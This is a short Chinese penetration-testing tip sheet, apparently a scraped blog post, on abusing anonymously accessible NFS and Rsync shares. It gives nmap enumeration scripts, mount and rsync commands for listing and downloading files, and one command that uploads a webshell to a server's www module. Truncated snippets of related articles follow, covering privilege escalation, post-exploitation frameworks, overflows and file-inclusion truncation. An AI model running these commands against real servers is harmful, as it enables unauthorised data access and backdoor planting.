NFS Rsync 渗透利用技巧

条件:存在匿名访问

NFS

目录列举

方法1:

nmap -script=nfs-ls.nse 127.0.0.1

方法2.

挂载到本地

mount -t nfs 192.168.0.1:/export/home/tmp/badperms

为了mount一个NFS共享需要首先在本地系统上创建一个目录,切换目录到/tmp/badperms然后你会看到位于IP地址为192.168.0.1上的export/home目录的内容。

Rsync

目录列举

方法1:

nmap -script=rsync-list-modules 127.0.0.1

方法2.

列举整个同步目录或指定目录:

rsync 10.0.0.12::

rsync 10.0.0.12::www/

下载文件或目录到本地:

rsync -avz 10.0.0.12::www/test.php /root

rsync -avz 10.0.0.12::www/ /var/tmp

上传本地文件到服务端:

rsync -avz webshell.php 10.0.0.12::www/

时间: 2024-10-03 20:05:03

NFS Rsync 渗透利用技巧的相关文章

各种提权、渗透经验技巧总结大全

旁站路径问题: 1.读网站配置. 2.用以下VBS: On Error Resume Next If (LCase(Right(WScript.Fullname, 11)) = “wscript.exe”) Then MsgBox Space(12) & “IIS Virtual Web Viewer” & Space(12) & Chr(13) & Space(9) & ” Usage:Cscript vWeb.vbs”, 4096, “Lilo” WScript

使用ansible自动化部署nfs+rsync+sersync+web01自动化挂载

第1章 思考 1.1如何一键使用ansible搭建 1.1.1第一步目标 首先我们要明确的是我们需要实现的是一键的自动化脚本,既执行一个脚本然后就自动化安装nfs+rsync+sersync,然后让web01自动挂载nfs共享目录, 1.1.2第二步关系明确及顺序 既然有目标了那么我们需要做的就是我们需要明白自动化安装的先后顺序. 既然我们是需要ansible才能自动化安装那么我们就需要先安装ansible 安装了ansible之后,既然我们想要挂载,那么我们就需要有nfs共享,和rsync备份

iOS macOS的后渗透利用工具:EggShell

EggShell是一款基于Python编写的iOS和macOS的后渗透利用工具.它有点类似于metasploit,我们可以用它来创建payload建立侦听.此外,在反弹回的session会话也为我们提供了许多额外的功能.例如文件的上传/下载,拍照,定位,shell命令执行,权限维持,提权,密码检索等.在服务器通信方面EggShell则采用了128位AES端到端的加密,并同时能够处理多个客户端程序.这是一个概念验证工具,适用于在你自己的机器上使用.有关更多详细信息请访问:http://lucasj

【溢出利用技巧】house of spirit friendly stack overflow

学习了一下L-CTF中介绍的一个栈溢出利用技巧,记录一下. 样例代码如下: /*  * blackngel's vulnerable program slightly modified by gb_master  */ #include <stdio.h> #include <string.h> #include <stdlib.h> void fvuln(char *str1, int age) {   char *ptr1, name[32];   int loca

phpSploit后渗透利用框架介绍

今天在freebuf 上看到有一篇介绍PhpSploit的远程控制框架的文章觉得不错,就把文章超过来了.方便以后自己查找.phpsploit可以帮助攻击者在客户端与Web服务器端之间建立隐蔽性极强的交互式链接(类似Shell).简而言之,这是一款后渗透利用工具,它能够让攻击者与目标主机(例如被入侵的Web服务器)维持访问链接,并实现提权操作.概述该工具会对标准客户端请求以及Web服务器相关请求的HTTP头数据进行混淆处理,并利用一个小型的多态后门来实现隐蔽通信: <? @eval($_SERVE

测试NFS+rsync+sersync+SMTP+shell脚本+cron

考核1: 实现拓扑图: 实验需要的机器: 名称 ip地址 主机名 web服务器 192.168.1.10 web01 rsync备份服务器 192.168.1.20 rsync nfs存储服务器 192.168.1.30 nfs 1,nfs创建一个目录名为/data/web的目录作为web服务器的后端存储,然后共享使用虚拟用户webuser,因为公司访问量不是很大,所以可以直接用sync来同步写入到磁盘 在NFS服务器上: yum -y install nfs-utils.x86_64 rpcb

nfs+rsync备份

我们先来做rsync 环境说明:1.操作系统:centos7 2.IP:192.168.7.226简称A&192.168.7.174 简称B 3.192.168.7.226做rsync的客户端,192.168.7.174做rsync的服务器,也就是说:将B服务器上的文件备份到A服务器上. 1.安装:A&B服务器上都要安装rsync yum install -y rsync 2.配置文件,在B服务器上进行配置 vim /etc/rsyncd.conf 我设置的特别简单,要根据实际情况来设定,

web+nfs+rsync实时备份

网络结构 服务器及IP主机名称规划 使用的4台服务器主机名IP对应信息见下表 服务器说明 外网IP 内网IP 主机名称 web服务器 10.0.0.8/24 172.16.1.8/24 web01 web服务器 10.0.0.7/24 172.16.1.7/24 web02 NFS存储服务器 10.0.0.31/24 172.16.1.31/24 nfs01 rsync备份服务器 10.0.0.41/24 172.16.1.41/24 backup 实例1-2 搭建网站集群后端NFS共享存储搭建

IFI 利用技巧

include后的文件带后缀的利用条件: (1)gpc=Off 不然%00会变成\0的 (2)php < 5.3.4  本人测试在5.4.4中未成功,详情见CVE-2006-7243 include包含的时候一定得有相关的权限,apache用户和所访问文件至少也得达到同组权限. 截断方法: (1)%00,gpc=Off (2)长文件名,linux超过4096字节就会被php截断,没有实验成功(5.2.8),windows 259字节,没尝试,这里与GPC没有关系. linux下使用../../.